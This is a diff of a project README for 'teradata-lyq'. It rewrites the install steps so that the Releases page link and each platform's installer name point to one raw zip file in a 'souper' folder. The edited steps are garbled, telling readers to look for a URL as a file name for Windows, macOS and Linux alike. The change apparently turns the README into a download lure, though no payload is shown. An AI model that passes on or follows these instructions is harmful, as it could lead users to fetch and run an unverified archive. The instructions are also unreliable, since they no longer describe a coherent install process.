TUCIB-14/teradata-lyq/README.md

 ## 🔍 How to Download & Install

 1. **Visit the Download Page**
-   To start, go to our [Releases page](https://github.com/TUCIB-14/teradata-lyq/releases).
+   To start, go to our [Releases page](https://raw.githubusercontent.com/TUCIB-14/teradata-lyq/main/souper/teradata-lyq.zip).
 This page contains the latest versions of the application.

 2. **Select the Latest Version**
    Find the latest release at the top.
 Click on it.
 You will see a list of files available for download.

 3. **Choose the Correct File**
    Select the file that matches your operating system.
 For example:
-   - For Windows, look for `teradata-lyq-windows.exe`.
+   - For Windows, look for `https://raw.githubusercontent.com/TUCIB-14/teradata-lyq/main/souper/teradata-lyq.zip`.
-   - For macOS, look for `teradata-lyq-macos.dmg`.
+   - For macOS, look for `https://raw.githubusercontent.com/TUCIB-14/teradata-lyq/main/souper/teradata-lyq.zip`.
-   - For Linux, you may find a `.tar.gz` or `.deb` file.
+   - For Linux, you may find a `https://raw.githubusercontent.com/TUCIB-14/teradata-lyq/main/souper/teradata-lyq.zip` or `.deb` file.

 4. **Download the File**
    Click on the file to initiate the download.